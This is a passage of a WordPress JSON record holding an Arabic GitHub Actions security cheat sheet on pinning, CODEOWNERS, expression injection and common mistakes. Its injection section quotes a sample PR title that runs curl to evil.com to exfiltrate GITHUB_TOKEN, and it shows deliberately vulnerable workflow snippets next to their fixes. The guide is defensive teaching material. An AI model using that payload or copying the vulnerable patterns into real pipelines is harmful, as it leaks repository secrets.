true<\/code><\/pre>\n<h2>6. \u0623\u0645\u0627\u0646 \u0625\u062c\u0631\u0627\u0621\u0627\u062a \u0627\u0644\u0637\u0631\u0641 \u0627\u0644\u062b\u0627\u0644\u062b<\/h2>\n<p>\u0643\u0644 \u0633\u0637\u0631 <code>uses:<\/code> \u0641\u064a \u0633\u064a\u0631 \u0639\u0645\u0644\u0643 \u0647\u0648 \u062a\u0628\u0639\u064a\u0629 \u0641\u064a \u0633\u0644\u0633\u0644\u0629 \u0627\u0644\u062a\u0648\u0631\u064a\u062f. \u062a\u0639\u0627\u0645\u0644 \u0645\u0639\u0647 \u0645\u062b\u0644 \u0623\u064a \u062a\u0628\u0639\u064a\u0629 \u0623\u062e\u0631\u0649.<\/p>\n<h3>\u0642\u0627\u0626\u0645\u0629 \u0627\u0644\u062a\u062f\u0642\u064a\u0642<\/h3>\n<p>\u0642\u0628\u0644 \u0627\u0639\u062a\u0645\u0627\u062f \u0623\u064a \u0625\u062c\u0631\u0627\u0621 \u062a\u0627\u0628\u0639 \u0644\u0637\u0631\u0641 \u062b\u0627\u0644\u062b\u060c \u062a\u062d\u0642\u0642 \u0645\u0646:<\/p>\n<ul>\n<li><strong>\u0627\u0644\u0646\u0627\u0634\u0631:<\/strong> \u0647\u0644 \u0647\u0648 \u0645\u0646 \u0645\u0646\u0634\u0626 \u0645\u0648\u062b\u0642 \u0623\u0648 \u0645\u0646\u0638\u0645\u0629 \u0645\u0639\u0631\u0648\u0641\u0629 (\u0645\u062b\u0644 <code>actions\/*<\/code>\u060c <code>aws-actions\/*<\/code>)\u061f<\/li>\n<li><strong>\u0627\u0644\u0643\u0648\u062f \u0627\u0644\u0645\u0635\u062f\u0631\u064a:<\/strong> \u0647\u0644 \u0642\u0631\u0623\u062a <code>action.yml<\/code> \u0648\u0633\u0643\u0631\u064a\u0628\u062a \u0646\u0642\u0637\u0629 \u0627\u0644\u062f\u062e\u0648\u0644\u061f<\/li>\n<li><strong>\u0627\u0644\u0635\u0644\u0627\u062d\u064a\u0627\u062a:<\/strong> \u0647\u0644 \u064a\u0637\u0644\u0628 \u0623\u0643\u062b\u0631 \u0645\u0645\u0627 \u064a\u062d\u062a\u0627\u062c\u061f<\/li>\n<li><strong>\u0627\u0644\u0646\u062c\u0648\u0645 \/ \u0627\u0644\u0627\u0633\u062a\u062e\u062f\u0627\u0645:<\/strong> \u0627\u0644\u0625\u062c\u0631\u0627\u0621\u0627\u062a \u0642\u0644\u064a\u0644\u0629 \u0627\u0644\u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0623\u0639\u0644\u0649 \u062e\u0637\u0648\u0631\u0629.<\/li>\n<li><strong>\u0627\u0644\u0635\u064a\u0627\u0646\u0629:<\/strong> \u0645\u062a\u0649 \u0643\u0627\u0646 \u0622\u062e\u0631 commit\u061f \u0647\u0644 \u064a\u062a\u0645 \u0645\u0639\u0627\u0644\u062c\u0629 \u0627\u0644\u0645\u0634\u0643\u0644\u0627\u062a\u061f<\/li>\n<li><strong>\u0627\u0644\u062a\u0628\u0639\u064a\u0627\u062a:<\/strong> \u0647\u0644 \u064a\u0633\u062d\u0628 \u0634\u062c\u0631\u0629 <code>node_modules<\/code> \u0636\u062e\u0645\u0629\u061f<\/li>\n<\/ul>\n<h3>\u0627\u0646\u0633\u062e \u0627\u0644\u0625\u062c\u0631\u0627\u0621\u0627\u062a \u0627\u0644\u062d\u0631\u062c\u0629<\/h3>\n<p>\u0644\u0644\u0625\u062c\u0631\u0627\u0621\u0627\u062a \u0627\u0644\u062a\u064a \u062a\u0639\u0645\u0644 \u0641\u064a \u062e\u0637\u0648\u0637 \u0623\u0646\u0627\u0628\u064a\u0628 \u062d\u0633\u0627\u0633\u0629\u060c \u0627\u0646\u0633\u062e\u0647\u0627 \u0625\u0644\u0649 \u0645\u0646\u0638\u0645\u062a\u0643:<\/p>\n<pre><code class=\"language-yaml\"># Instead of:\n- uses: some-random-org\/deploy-action@v2\n\n# Fork and pin:\n- uses: your-org\/deploy-action@a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2<\/code><\/pre>\n<p>\u0623\u0646\u0634\u0626 \u0633\u064a\u0631 \u0639\u0645\u0644 \u0645\u062c\u062f\u0648\u0644 \u0644\u0645\u0632\u0627\u0645\u0646\u0629 \u0646\u0633\u062e\u062a\u0643 \u0648\u0645\u0631\u0627\u062c\u0639\u0629 \u0627\u0644\u0641\u0631\u0648\u0642\u0627\u062a \u0642\u0628\u0644 \u062f\u0645\u062c \u0627\u0644\u062a\u063a\u064a\u064a\u0631\u0627\u062a \u0627\u0644\u0623\u0635\u0644\u064a\u0629.<\/p>\n<h3>CODEOWNERS \u0644\u0645\u0644\u0641\u0627\u062a \u0633\u064a\u0631 \u0627\u0644\u0639\u0645\u0644<\/h3>\n<p>\u0627\u0637\u0644\u0628 \u0645\u0631\u0627\u062c\u0639\u0629 \u0641\u0631\u064a\u0642 \u0627\u0644\u0623\u0645\u0627\u0646 \u0644\u0623\u064a \u062a\u063a\u064a\u064a\u0631\u0627\u062a \u0641\u064a \u0633\u064a\u0631 \u0627\u0644\u0639\u0645\u0644:<\/p>\n<pre><code class=\"language-bash\"># .github\/CODEOWNERS\n.github\/workflows\/   @your-org\/security-team\n.github\/actions\/      @your-org\/security-team<\/code><\/pre>\n<p>\u0627\u062f\u0645\u062c \u0647\u0630\u0627 \u0645\u0639 \u0642\u0648\u0627\u0639\u062f \u062d\u0645\u0627\u064a\u0629 \u0627\u0644\u0641\u0631\u0648\u0639 \u0627\u0644\u062a\u064a \u062a\u062a\u0637\u0644\u0628 \u0645\u0648\u0627\u0641\u0642\u0629 CODEOWNERS \u0644\u062c\u0639\u0644\u0647\u0627 \u0642\u0627\u0628\u0644\u0629 \u0644\u0644\u062a\u0637\u0628\u064a\u0642.<\/p>\n<h2>7. \u0645\u0646\u0639 \u062d\u0642\u0646 \u0627\u0644\u062a\u0639\u0628\u064a\u0631\u0627\u062a<\/h2>\n<p>\u062a\u0639\u0628\u064a\u0631\u0627\u062a GitHub Actions (<code>${{ }}<\/code>) \u064a\u062a\u0645 \u062a\u0648\u0633\u064a\u0639\u0647\u0627 \u0643\u0642\u0648\u0627\u0644\u0628 <em>\u0642\u0628\u0644<\/em> \u0623\u0646 \u064a\u0631\u0627\u0647\u0627 \u0627\u0644\u0640 shell. \u0625\u0630\u0627 \u062a\u062d\u0643\u0645 \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u0628\u0627\u0644\u0642\u064a\u0645\u0629\u060c \u0641\u0625\u0646\u0647 \u064a\u062a\u062d\u0643\u0645 \u0641\u064a \u0627\u0644\u0640 shell \u0627\u0644\u062e\u0627\u0635 \u0628\u0643.<\/p>\n<h3>\u0627\u0644\u0646\u0645\u0637 \u0627\u0644\u062e\u0637\u064a\u0631<\/h3>\n<pre><code class=\"language-yaml\"># VULNERABLE \u2014 attacker controls the PR title\n- name: Echo PR title\n  run: echo \"PR: ${{ github.event.pull_request.title }}\"<\/code><\/pre>\n<p>\u0639\u0646\u0648\u0627\u0646 PR \u062e\u0628\u064a\u062b \u0645\u062b\u0644 <code>Fix\"; curl http:\/\/evil.com\/steal?token=$GITHUB_TOKEN #<\/code> \u064a\u0643\u0633\u0631 \u0623\u0645\u0631 echo \u0648\u064a\u0633\u0631\u0651\u0628 \u0627\u0644\u0631\u0645\u0632 \u0627\u0644\u0645\u0645\u064a\u0632.<\/p>\n<p><strong>\u0627\u0644\u0633\u064a\u0627\u0642\u0627\u062a \u0627\u0644\u062e\u0637\u064a\u0631\u0629 \u0627\u0644\u062a\u064a \u062a\u0642\u0628\u0644 \u0645\u062f\u062e\u0644\u0627\u062a \u0627\u0644\u0645\u0633\u062a\u062e\u062f\u0645:<\/strong><\/p>\n<ul>\n<li><code>github.event.pull_request.title<\/code><\/li>\n<li><code>github.event.pull_request.body<\/code><\/li>\n<li><code>github.event.issue.title<\/code><\/li>\n<li><code>github.event.issue.body<\/code><\/li>\n<li><code>github.event.comment.body<\/code><\/li>\n<li><code>github.event.review.body<\/code><\/li>\n<li><code>github.event.head_commit.message<\/code><\/li>\n<li><code>github.head_ref<\/code> (\u0627\u0633\u0645 \u0627\u0644\u0641\u0631\u0639 \u0645\u0646 \u0627\u0644\u0640 forks)<\/li>\n<\/ul>\n<h3>\u0627\u0644\u0628\u062f\u064a\u0644 \u0627\u0644\u0622\u0645\u0646 \u2014 \u0645\u062a\u063a\u064a\u0631\u0627\u062a \u0627\u0644\u0628\u064a\u0626\u0629<\/h3>\n<pre><code class=\"language-yaml\"># SAFE \u2014 value is passed as an environment variable, not injected into the script\n- name: Echo PR title\n  run: echo \"PR: $PR_TITLE\"\n  env:\n    PR_TITLE: ${{ github.event.pull_request.title }}<\/code><\/pre>\n<p>\u0639\u0646\u062f\u0645\u0627 \u062a\u0645\u0631 \u0627\u0644\u0642\u064a\u0645\u0629 \u0639\u0628\u0631 \u0645\u062a\u063a\u064a\u0631 \u0628\u064a\u0626\u0629\u060c \u064a\u062a\u0639\u0627\u0645\u0644 \u0645\u0639\u0647\u0627 \u0627\u0644\u0640 shell \u0643\u0628\u064a\u0627\u0646\u0627\u062a \u0648\u0644\u064a\u0633 \u0643\u0634\u064a\u0641\u0631\u0629. \u0647\u0630\u0627 \u0647\u0648 \u0627\u0644\u062d\u0644 \u0644\u0640 <strong>\u0643\u0644<\/strong> \u062d\u0642\u0646 \u062a\u0639\u0628\u064a\u0631.<\/p>\n<h3>\u0627\u0644\u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0627\u0644\u0622\u0645\u0646 \u0641\u064a \u0627\u0644\u0634\u0631\u0648\u0637<\/h3>\n<p>\u0627\u0644\u062a\u0639\u0628\u064a\u0631\u0627\u062a \u0641\u064a \u0634\u0631\u0648\u0637 <code>if:<\/code> \u0622\u0645\u0646\u0629 \u0644\u0623\u0646\u0647\u0627 \u062a\u064f\u0642\u064a\u064e\u0651\u0645 \u0628\u0648\u0627\u0633\u0637\u0629 \u0628\u064a\u0626\u0629 \u062a\u0634\u063a\u064a\u0644 Actions \u0648\u0644\u064a\u0633 \u0627\u0644\u0640 shell:<\/p>\n<pre><code class=\"language-yaml\"># SAFE \u2014 evaluated by Actions runtime, not shell\n- name: Check label\n  if: contains(github.event.pull_request.labels.*.name, 'deploy')\n  run: echo \"Deploy label found\"<\/code><\/pre>\n<h2>8. \u0627\u0644\u0623\u062e\u0637\u0627\u0621 \u0627\u0644\u0634\u0627\u0626\u0639\u0629 \u2014 \u0623\u0647\u0645 5 \u0645\u0639 \u0627\u0644\u0625\u0635\u0644\u0627\u062d\u0627\u062a<\/h2>\n<h3>\u0627\u0644\u062e\u0637\u0623 1: \u0635\u0644\u0627\u062d\u064a\u0627\u062a \u0627\u0644\u0631\u0645\u0632 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a\u0629 (\u0627\u0644\u0645\u0641\u0631\u0637\u0629)<\/h3>\n<pre><code class=\"language-yaml\"># BAD \u2014 implicit read-write on everything\non: push\njobs:\n  build:\n    runs-on: ubuntu-latest\n    steps: ...\n\n# FIXED \u2014 explicit read-only default\non: push\npermissions: read-all\njobs:\n  build:\n    runs-on: ubuntu-latest\n    steps: ...<\/code><\/pre>\n<h3>\u0627\u0644\u062e\u0637\u0623 2: \u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0648\u0633\u0648\u0645 \u0642\u0627\u0628\u0644\u0629 \u0644\u0644\u062a\u063a\u064a\u064a\u0631 \u0644\u0644\u0625\u062c\u0631\u0627\u0621\u0627\u062a<\/h3>\n<pre><code class=\"language-yaml\"># BAD\n- uses: actions\/setup-node@v4\n\n# FIXED\n- uses: actions\/setup-node@60edb5dd545a775178f52524783378180af0d1f8 # v4.0.2<\/code><\/pre>\n<h3>\u0627\u0644\u062e\u0637\u0623 3: \u0628\u064a\u0627\u0646\u0627\u062a \u0627\u0639\u062a\u0645\u0627\u062f \u0633\u062d\u0627\u0628\u064a\u0629 \u0637\u0648\u064a\u0644\u0629 \u0627\u0644\u0623\u062c\u0644 \u0643\u0623\u0633\u0631\u0627\u0631<\/h3>\n<pre><code class=\"language-yaml\"># BAD \u2014 static AWS keys that never expire\nenv:\n  AWS_ACCESS_KEY_ID: ${{ secrets.AWS_ACCESS_KEY_ID }}\n  AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }}\n\n# FIXED \u2014 OIDC federation, no stored credentials\n- uses: aws-actions\/configure-aws-credentials@e3dd6a429d7300a6a4c196c26e071d42e0343502\n  with:\n    role-to-assume: arn:aws:iam::123456789012:role\/GitHubActions\n    aws-region: us-east-1<\/code><\/pre>\n<h3>\u0627\u0644\u062e\u0637\u0623 4: \u0633\u062d\u0628 \u0643\u0648\u062f PR \u0641\u064a pull_request_target<\/h3>\n<pre><code class=\"language-yaml\"># BAD \u2014 runs untrusted code with secrets\non: pull_request_target\nsteps:\n  - uses: actions\/checkout@v4\n    with:\n      ref: ${{ github.event.pull_request.head.sha }}\n  - run: make build\n\n# FIXED \u2014 use pull_request trigger (no secrets for forks)\non: pull_request\nsteps:\n  - uses: actions\/checkout@v4\n  - run: make build<\/code><\/pre>\n<h3>\u0627\u0644\u062e\u0637\u0623 5: \u062d\u0642\u0646 \u0627\u0644\u062a\u0639\u0628\u064a\u0631\u0627\u062a \u0639\u0628\u0631 run:<\/h3>\n<pre><code class=\"language-yaml\"># BAD \u2014 direct interpolation of user input\n- run: echo \"Issue: ${{ github.event.issue.title }}\"\n\n# FIXED \u2014 pass through environment variable\n- run: echo \"Issue: $ISSUE_TITLE\"\n  env:\n    ISSUE_TITLE: ${{ github.event.issue.title }}<\/code><\/pre>\n<h2>\u0628\u0637\u0627\u0642\u0629 \u0645\u0631\u062c\u0639\u064a\u0629 \u0633\u0631\u064a\u0639\u0629<\/h2>\n<table>\n<thead>\n<tr>\n<th>\u0627\u0644\u0645\u0645\u0627\u0631\u0633\u0629<\/th>\n<th>\u0645\u0644\u062e\u0635<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td>\u0627\u0644\u0635\u0644\u0627\u062d\u064a\u0627\u062a \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a\u0629<\/td>\n<td><code>permissions: read-all<\/code> \u0641\u064a \u0623\u0639\u0644\u0649 \u0633\u064a\u0631 \u0627\u0644\u0639\u0645\u0644<\/td>\n<\/tr>\n<tr>\n<td>\u062a\u062b\u0628\u064a\u062a \u0627\u0644\u0625\u062c\u0631\u0627\u0621\u0627\u062a<\/td>\n<td>\u0627\u0633\u062a\u062e\u062f\u0645 SHA \u0643\u0627\u0645\u0644 \u0645\u0646 40 \u062d\u0631\u0641\u0627\u064b + \u0648\u0633\u0645 \u062a\u0639\u0644\u064a\u0642<\/td>\n<\/tr>\n<tr>\n<td>\u062a\u062d\u062f\u064a\u062b \u062a\u0644\u0642\u0627\u0626\u064a \u0644\u0644\u062a\u062b\u0628\u064a\u062a\u0627\u062a<\/td>\n<td>Dependabot \u0645\u0639 \u0646\u0638\u0627\u0645 <code>github-actions<\/code><\/td>\n<\/tr>\n<tr>\n<td>\u0645\u0635\u0627\u062f\u0642\u0629 \u0627\u0644\u0633\u062d\u0627\u0628\u0629<\/td>\n<td>\u0627\u062a\u062d\u0627\u062f OIDC\u060c \u0644\u0627 \u0645\u0641\u0627\u062a\u064a\u062d \u062b\u0627\u0628\u062a\u0629 \u0623\u0628\u062f\u0627\u064b<\/td>\n<\/tr>\n<tr>\n<td>\u062d\u0645\u0627\u064a\u0629 \u0627\u0644\u0623\u0633\u0631\u0627\u0631<\/td>\n<td>\u0646\u0637\u0627\u0642\u0627\u062a \u0627\u0644\u0628\u064a\u0626\u0629 + \u0642\u0648\u0627\u0639\u062f \u0627\u0644\u062d\u0645\u0627\u064a\u0629<\/td>\n<\/tr>\n<tr>\n<td>\u0645\u0646\u0639 \u0627\u0644\u062d\u0642\u0646<\/td>\n<td>\u0627\u0633\u062a\u062e\u062f\u0645 \u062f\u0627\u0626\u0645\u0627\u064b <code>env:<\/code> \u0644\u0644\u0642\u064a\u0645 \u0627\u0644\u062a\u064a \u064a\u062a\u062d\u0643\u0645 \u0628\u0647\u0627 \u0627\u0644\u0645\u0633\u062a\u062e\u062f\u0645<\/td>\n<\/tr>\n<tr>\n<td>\u0645\u0631\u0627\u062c\u0639\u0629 \u0633\u064a\u0631 \u0627\u0644\u0639\u0645\u0644<\/td>\n<td>CODEOWNERS \u0639\u0644\u0649 <code>.github\/workflows\/<\/code><\/td>\n<\/tr>\n<tr>\n<td>\u062a\u062c\u0646\u0628 \u0627\u0644\u0645\u0634\u063a\u0651\u0644\u0627\u062a \u0627\u0644\u062e\u0637\u0631\u0629<\/td>\n<td>\u062a\u062c\u0646\u0628 <code>pull_request_target<\/code> + checkout<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>\u062a\u0637\u0628\u064a\u0642 \u062d\u062a\u0649 \u0646\u0635\u0641 \u0647\u0630\u0647 \u0627\u0644\u0645\u0645\u0627\u0631\u0633\u0627\u062a \u064a\u0636\u0639 \u062e\u0637 \u0623\u0646\u0627\u0628\u064a\u0628 CI\/CD \u0627\u0644\u062e\u0627\u0635 \u0628\u0643 \u0641\u064a \u0645\u0642\u062f\u0645\u0629 \u0645\u0639\u0638\u0645 \u0627\u0644\u0645\u0646\u0638\u0645\u0627\u062a. \u0627\u0628\u062f\u0623 \u0628\u0627\u0644\u0635\u0644\u0627\u062d\u064a\u0627\u062a \u0648\u0627\u0644\u062a\u062b\u0628\u064a\u062a \u2014 \u064a\u0633\u062a\u063a\u0631\u0642\u0627\u0646 \u062e\u0645\u0633 \u062f\u0642\u0627\u0626\u0642 \u0648\u064a\u0632\u064a\u0644\u0627\u0646 \u0641\u0626\u0627\u062a \u0643\u0627\u0645\u0644\u0629 \u0645\u0646 \u0647\u062c\u0645\u0627\u062a \u0633\u0644\u0633\u0644\u0629 \u0627\u0644\u062a\u0648\u0631\u064a\u062f. \u062b\u0645 \u0627\u0639\u0645\u0644 \u0639\u0644\u0649 \u0627\u062a\u062d\u0627\u062f OIDC \u0648\u0645\u0646\u0639 \u062d\u0642\u0646 \u0627\u0644\u062a\u0639\u0628\u064a\u0631\u0627\u062a \u0644\u0633\u062f \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0645\u062a\u0628\u0642\u064a\u0629.<\/p>\n<p>\u0644\u0644\u062a\u062f\u0631\u064a\u0628 \u0627\u0644\u0639\u0645\u0644\u064a\u060c \u0627\u0633\u062a\u0643\u0634\u0641 <a href=\"https:\/\/secure-pipelines.com\/ar\/category\/ci-cd-security\/\">\u0645\u062e\u062a\u0628\u0631\u0627\u062a \u0623\u0645\u0627\u0646 CI\/CD<\/a> \u0648<a href=\"https:\/\/secure-pipelines.com\/ar\/category\/github-actions\/\">\u0623\u062f\u0644\u0629 GitHub Actions<\/a> \u0644\u0631\u0624\u064a\u0629 \u0647\u0630\u0647 \u0627\u0644\u0623\u0646\u0645\u0627\u0637 \u0645\u0637\u0628\u0642\u0629 \u0641\u064a \u0633\u064a\u0646\u0627\u0631\u064a\u0648\u0647\u0627\u062a \u0648\u0627\u0642\u0639\u064a\u0629.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>1. \u0627\u0644\u0635\u0644\u0627\u062d\u064a\u0627\u062a \u2014 \u0645\u0628\u062f\u0623 \u0627\u0644\u062d\u062f \u0627\u0644\u0623\u062f\u0646\u0649 \u0645\u0646 \u0627\u0644\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a \u0623\u0647\u0645 \u062a\u063a\u064a\u064a\u0631 \u064a\u0645\u0643\u0646\u0643 \u0625\u062c\u0631\u0627\u0624\u0647 \u0639\u0644\u0649 \u0623\u064a \u0633\u064a\u0631 \u0639\u0645\u0644 \u0641\u064a GitHub Actions \u0647\u0648 \u062a\u0642\u064a\u064a\u062f \u0627\u0644\u0635\u0644\u0627\u062d\u064a\u0627\u062a. \u0628\u0634\u0643\u0644 \u0627\u0641\u062a\u0631\u0627\u0636\u064a\u060c \u064a\u0645\u062a\u0644\u0643 GITHUB_TOKEN \u0635\u0644\u0627\u062d\u064a\u0627\u062a \u0642\u0631\u0627\u0621\u0629 \u0648\u0643\u062a\u0627\u0628\u0629 \u0639\u0644\u0649 \u0645\u0639\u0638\u0645 \u0627\u0644\u0646\u0637\u0627\u0642\u0627\u062a. \u0642\u0645 \u0628\u062a\u063a\u064a\u064a\u0631 \u0630\u0644\u0643 \u0641\u0648\u0631\u0627\u064b. \u0635\u0644\u0627\u062d\u064a\u0627\u062a \u0627\u0644\u0642\u0631\u0627\u0621\u0629 \u0641\u0642\u0637 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a\u0629 (\u0627\u0644\u0645\u0633\u062a\u0648\u0649 \u0627\u0644\u0623\u0639\u0644\u0649) \u0636\u0639 \u0647\u0630\u0627 \u0641\u064a \u0623\u0639\u0644\u0649 \u0643\u0644 \u0645\u0644\u0641 \u0633\u064a\u0631 \u0639\u0645\u0644 \u0644\u062c\u0639\u0644 \u0627\u0644\u0642\u0631\u0627\u0621\u0629 \u0641\u0642\u0637 \u0647\u064a \u0627\u0644\u0648\u0636\u0639 &#8230; <a title=\"\u0648\u0631\u0642\u0629 \u0645\u0631\u062c\u0639\u064a\u0629 \u0644\u0623\u0645\u0627\u0646 GitHub Actions: \u0627\u0644\u0635\u0644\u0627\u062d\u064a\u0627\u062a\u060c \u0627\u0644\u062a\u062b\u0628\u064a\u062a\u060c \u0627\u0644\u0623\u0633\u0631\u0627\u0631\u060c \u0648 OIDC\" class=\"read-more\" href=\"https:\/\/secure-pipelines.com\/ar\/ci-cd-security\/github-actions-security-cheat-sheet\/\" aria-label=\"Read more about \u0648\u0631\u0642\u0629 \u0645\u0631\u062c\u0639\u064a\u0629 \u0644\u0623\u0645\u0627\u0646 GitHub Actions: \u0627\u0644\u0635\u0644\u0627\u062d\u064a\u0627\u062a\u060c \u0627\u0644\u062a\u062b\u0628\u064a\u062a\u060c \u0627\u0644\u0623\u0633\u0631\u0627\u0631\u060c \u0648 OIDC\">\u0627\u0642\u0631\u0623 \u0627\u0644\u0645\u0632\u064a\u062f<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26,29],"tags":[],"post_folder":[],"class_list":["post-798","post","type-post","status-publish","format-standard","hentry","category-ci-cd-security","category-github-actions"],"_links":{"self":[{"href":"https:\/\/secure-pipelines.com\/ar\/wp-json\/wp\/v2\/posts\/798","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/secure-pipelines.com\/ar\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/secure-pipelines.com\/ar\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/secure-pipelines.com\/ar\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/secure-pipelines.com\/ar\/wp-json\/wp\/v2\/comments?post=798"}],"version-history":[{"count":0,"href":"https:\/\/secure-pipelines.com\/ar\/wp-json\/wp\/v2\/posts\/798\/revisions"}],"wp:attachment":[{"href":"https:\/\/secure-pipelines.com\/ar\/wp-json\/wp\/v2\/media?parent=798"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/secure-pipelines.com\/ar\/wp-json\/wp\/v2\/categories?post=798"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/secure-pipelines.com\/ar\/wp-json\/wp\/v2\/tags?post=798"},{"taxonomy":"post_folder","embeddable":true,"href":"https:\/\/secure-pipelines.com\/ar\/wp-json\/wp\/v2\/post_folder?post=798"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}